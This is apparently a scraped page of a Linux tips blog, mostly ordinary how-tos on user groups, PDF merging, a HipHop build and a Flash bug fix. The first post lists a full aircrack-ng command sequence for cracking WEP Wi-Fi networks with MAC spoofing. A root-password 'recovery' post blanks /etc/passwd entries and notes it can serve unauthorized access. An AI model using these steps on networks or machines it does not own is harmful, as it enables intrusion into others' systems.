Hacking Wireless with Ubuntu

% %

READ THIS: I have received too many questions on this video, so I may not reply back anymore, but check out the aircrack forums here: forum.aircrack-ng.org FYI, I used a Belkin Wireless G USB Is your card compatible? http Hacking wireless networks with the latest edition of Ubuntu, 9.04 jaunty jackalope. Download Ubuntu: www.ubuntu.com High definition pictture of the cracked network: thisislegal.com This only works on WEP networks. sudo apt-get install macchanger sudo apt-get install aircrack-ng sudo airmon-ng stop wlan0 sudo ifconfig wlan0 down sudo macchanger –mac 00:11:22:33:44:55 wlan0 sudo airmon-ng start wlan0 sudo airodump-ng wlan0 sudo airodump-ng -c [channel] -w [filename] –bssid [bssid] wlan0 sudo aireplay-ng -1 0 -a [bssid] -h [fake mac] mon0 sudo aireplay-ng -3 -b [bssid] -h [fake mac] wlan0 aircrack-ng -b [bssid] [filename]-01.cap

Related posts:

  1. How To Hack Wireless
  2. Hacking wireless networks with Man in the Middle attacks
  3. Crack WPA with Backtrack3
  4. Hack Wireless WEP Network
  5. Howto crack (or hack) a wireless network with Wired Equivalent Privacy (WEP)
  6. Howto use WEP encryption with Ubuntu Linux
  7. Wireless: How To Secure Your Wireless Network
  8. ( hack wireless ) How to crack wepkey..easy way (winaircrak)
  9. Ubuntu Howto: Install Ruby and Ruby on Rails
  10. Crack WPA Tutorial

Comments (25)

Linux How to: Add a existing user to existing group

usermod example

Add existing user john to admin supplementary/secondary group with usermod command using -a option ~ i.e. add the user to the supplemental group(s). Use only with -G option:

# usermod -a -G admin john

Change existing user john primary group to mail:

# usermod -g mail tony

Related posts:

  1. Migrate existing Ext3 filesystems to Ext4
  2. Rethinking the GUI (Graphical User Interface) and the CLI (Command Line Interface)
  3. Run Single Commands on a SSH-based Server
  4. Howto Recover a Linux Root Password
  5. Howto: How to Reset the MySQL Root Password
  6. Linux Gets Automatic Tuning
  7. Microsoft is using Linux
  8. Linux Audio Editor Top 3
  9. How to mount bin / cue image files in Linux
  10. VMware Killer: Xen With Graphical User Interface On A Fedora 7 Desktop

Comments

Howto Recover a Linux Root Password

This post is intended for users that forgot the root passwords or can’t use it due to other problems (corrupted file /etc/passwd or whatever). Can also be used to gain unauthorized to linux machines, but don’t do that.

What to do
Boot using a recovery CD or DVD.

Mount the drive

mount /mnt /dev/sda2

Replace the existing root password with an empty one

sed /^root/s/.*:root:/root::0:0:root:/ /mnt/etc/passwd

And reboot – and you are done ;-)

Related posts:

  1. Howto: How to Reset the MySQL Root Password
  2. Recover (Crack) a password from a Microsoft Access Database (mdb)
  3. Crack or Recover Password Protected Excel Spreadsheet
  4. How to hack Windows password with Ophcrack
  5. Crack or Recover Read-only Password Protected Word Document
  6. HackerGuide: Crack Password Encrypted Zip-files
  7. Howto Create a libstdc++ Compat on Debian (e.g. libstdc++-libc6.2-2.so.3)
  8. Ubuntu Howto: Install Xen
  9. Crack zip password with fcrackzip
  10. Howto Crack Rar, 7z, and zip files in Linux

Comments

Combine Multiple PDFs Into One File

From time to time it is very useful to combine multiple PDF documents into one file.

Install gs (ghostscript) and pdftk (tool for manipulating PDF documents)

sudo aptitude install gs pdftk

Now we will see one example, which shows how to combine a few pdf files; 1.pdf,2.pdf,3.pdf.

gs -dNOPAUSE -sDEVICE=pdfwrite -sOUTPUTFILE=combined_pdf.pdf -dBATCH 1.pdf 2.pdf 3.pdf

If you want to know more options available for gs command check the gs man page

Related posts:

  1. dos2unix on Ubuntu and Debian
  2. Crack pdf password with pdfcrack
  3. Bash shortcuts tips and tricks
  4. Track file downloads and outgoing links with Google Analytics
  5. HackerGuide: Crack Password Encrypted Zip-files
  6. Howto: Install Ruby and Rails on Debian or Ubuntu
  7. Upgrading to Ubuntu 9.04
  8. How to mount bin / cue image files in Linux
  9. Crack zip password with fcrackzip
  10. Executing SQL Statements from a Text File

Comments

Top 10 Free Windows 7 Applications

  • 7-Zip file archiver – a polished, quickly, and efficient file archiver. Supports the following formats, 7z, ZIP, GZIP, BZIP2, TAR, RAR, CAB, ISO, ARJ, LZH, CHM, MSI, WIM, Z, CPIO, RPM, DEB and NSIS.
  • Infra Recorder – User-friendly and lean recorder suite for CD / DVD / HD DVD / Blu-ray. Supports also creation of music CDs from MP3 files directly.
  • VLC Player – The best and most user-friendly film and video player. Simply a must have.
  • Launchy – A so called key-stroke launcher. Makes it smart and easy to start programs in Windows just like Quicksilver does it for Mac and Gnome Do for Gnome under Linux.
  • Paint.NET – Good, polished, and fast photo processing and editing program. Smarter and more user friendly than Adobe Photoshop ;-)
  • PDFCreator – Easy and quick program to create PDF files. PDFCreator easily creates PDFs from any Windows program. Use it like a printer in Word, StarCalc or any other Windows application.
  • Notepad++ – Wonderful and quick editor for text and various programming languages.
  • uTorrent – BitTorrent client used to download movies, software and music albums from the peer to peer net. The stuff for download can often be found on thepiratebay.org or torrentz.com.

  • Firefox – Quick and easy to use browser. A Must have on Windows 7.
  • Picasa – Easy and simple program for managing and storing photos and photo albums.
  • iTunes – super duper program managing music collections, it can handle tons of mp3 files ;-)
  • VirtualBox – easy and fast virtual machine that can be used to test Linux distributions, and to install windows inside another windows ;) – Fancy, fancy and quite usable.
  • OpenOffice – complete office suite containing; Word processing, Spreadsheets, Presentation editor, Drawing, Database programs and etc. A must have, and it works better than Microsoft Office.
  • Inkscape – Drawing program for drawing vector drawings (logos and such things).
  • Scribus – Polished, user-friendly DTP program, used to create brochures, catalogs, reports, articles, etc.

Related posts:

  1. Seamless Windows Applications on Ubuntu Linux Using VirtualBox
  2. What is the coolest thing you can do using Linux that you can’t do with Windows or on a Mac?
  3. Xen Howto: Install Windows
  4. Apple Safari Browser on Windows
  5. InfraRecorder: Open Source CD Burning for Windows XP/Vista
  6. Windows: Free and Open Source Image Editing
  7. X11 for Windows XP and Vista
  8. Howto Crack and Remove Windows Media Video (WMV/ASF) and Audio (WMA) DRM License WMP with FairUse4WM and Mirakagi
  9. Windows Developers Begin Slow Defection to Linux
  10. Windows 7 Themes

Comments

Howto install HipHop for PHP on Ubuntu

HipHop is a source code transformer which transforms PHP source code into highly optimized C++ and then compiles it using g++.

Required packages

sudo apt-get install cmake g++ libboost-dev flex bison re2c libmysqlclient-dev libxml2-dev libmcrypt-dev libicu-dev openssl binutils-dev libcap-dev libgd2-xpm-dev zlib1g-dev libtbb-dev libonig-dev libpcre3-dev git-core autoconf libtool libcurl4-openssl-dev libboost-system-dev libboost-program-options-dev libboost-filesystem-dev

Get the HipHop source-code

mkdir hiphop
cd hiphop
git clone git://github.com/facebook/hiphop-php
cd hiphop-php
export CMAKE_PREFIX_PATH=`/bin/pwd`/../
export HPHP_HOME=`/bin/pwd`
export HPHP_LIB=`/bin/pwd`/bin
git submodule init
git submodule update
cd ..

Building third-party libraries

libevent

wget http://www.monkey.org/~provos/libevent-1.4.13-stable.tar.gz
tar -xzvf libevent-1.4.13-stable.tar.gz
cd libevent-1.4.13-stable
cp ../hiphop-php/src/third_party/libevent.fb-changes.diff .
patch < libevent.fb-changes.diff
./configure --prefix=$CMAKE_PREFIX_PATH
make
make install
cd ..

ICU4

wget http://download.icu-project.org/files/icu4c/4.2.1/icu4c-4_2_1-src.tgz
tar -xvzf icu4c-4_2_1-src.tgz
cd icu/source
./configure --prefix=$CMAKE_PREFIX_PATH
make
make install
cd ../../

libCurl

wget http://curl.haxx.se/download/curl-7.20.0.tar.gz
tar -xvzf curl-7.20.0.tar.gz
cd curl-7.20.0
cp ../hiphop-php/src/third_party/libcurl.fb-changes.diff .
patch -p0 < libcurl.fb-changes.diff
./configure --prefix=$CMAKE_PREFIX_PATH
make
make install
cd ..

Build HipHop

cd hiphop-php
cmake .
make

Related posts:

  1. Howto: Install Ruby and Rails on Debian or Ubuntu
  2. Ubuntu Howto: Install Oracle
  3. Ubuntu Howto: Install Sun Java
  4. Ubuntu Howto: Install Xen
  5. Howto Install Carwhisperer on Ubuntu 9.10
  6. Howto: Install Windows Vista Fonts in Ubuntu
  7. Ubuntu Howto: Install Ruby and Ruby on Rails
  8. Howto install Java on Debian Sarge
  9. Howto Install Oracle on Debian
  10. Howto Install Fedora From a USB Flash Key Drive

Comments (4)

What to Expect: Ubuntu 10.04 LTS: The Lucid Lynx

Ubuntu 10.04 Alpha 2 is available and comes with Linux kernel 2.6.32, KDE 4.4 RC1 and a significant faster boot process. The release is a “alpha” release, which means that it is not fully developed and therefore may contain errors and other obst. The final version of Ubuntu 10.04 LTS it planned to be released on the 29 April 2010.

Really cool stuff

  • PiTiVi included as default. PiTiVi is considered the most intuitive and featureful movie editor for the Linux desktop.
  • The boot process. The goal is to reach 10 seconds for booting with 10.04 aka Lucid. The adoption of Upstart is one of the techniques to make the goal come true.
  • Hal removal. The removal of the hal package makes Ubuntu faster to boot and faster to resume from suspend.
  • Kernel 2.6.32. The new kernel means 3D support for newer Radeon graphics chips, better use of power saving features offered by the latest hardware and numerous enhancements to KVM and Btrfs are some of the outstanding items among the many thousands of changes undertaken for the latest kernel version. Various other improvements should also make Linux 2.6.32 more reactive and as a result, feel faster.

Related posts:

  1. Development Release: Ubuntu 8.10 Alpha 4
  2. Ubuntu Studio
  3. Google’s new operating system: Chrome OS boots at 7 seconds
  4. Ubuntu Howto: Install Xen
  5. iTunes on Linux (Ubuntu)
  6. Seamless Windows Applications on Ubuntu Linux Using VirtualBox
  7. OpenVZ joins forces with Ubuntu
  8. Ubuntu Netboot and Netinstall with PXE
  9. Ubuntu Ubuntu 6.10 (Edgy) – impressive
  10. Howto: Install Ruby and Rails on Debian or Ubuntu

Comments (1)

Firefox Flash Interaction Bug: I Cannot Click In Flash Application e.g. Youtube

I experienced recently that I was unable to hit and click in flash based application using the mouse, which meant that I was forced to use the keyboard to navigate in all flash application – not a good user experience and very annoying. Adobe Flash does simply not register any mouse clicks (e.g. on YouTube, Google Analytics, etc.).

However I have researched on the bug, actually it was quite difficult to find anyone, who had experienced problem and reported it, also because the problem is hard to describe consistently. This fact was also clear, when I read the Ubuntu bug report.

The descriptions of the problem varies a lot: “Clicking on items in Flash player does nothing”, “I Cannot Click On Flash In Ubuntu”, “Flash does not register any clicks”, and “flash does not recognise mouse clicks”.

Solution

  • Hit ALT+F2 and enter
  • gksudo gedit /usr/lib/nspluginwrapper/i386/linux/npviewer
  • add the following line BEFORE the last line of text
  • export GDK_NATIVE_WINDOWS=1
  • Save.
  • Restart any applications using flash

Related posts:

  1. Howto embed evince pdf viewer into Firefox on fc5
  2. Spotify Free (+ Premium) Review – Awesome Music Streaming Application
  3. Ubuntu: Print to PDF or PDF Export
  4. Launchy: a Keystroke Application Launcher for Windows
  5. Flash Decompiler Trillix for Windows: convert SWF into FLA
  6. How to catch and decompile a flash game
  7. Ripping, Decompiling, Modifying and Exporting Flash Games
  8. How to Make a Flash Game Trainer
  9. How to make a flash game trainer in VB6
  10. Fedora Core 5 Test 2 Flash demo

Comments (3)

« Previous entries Next Page » Next Page »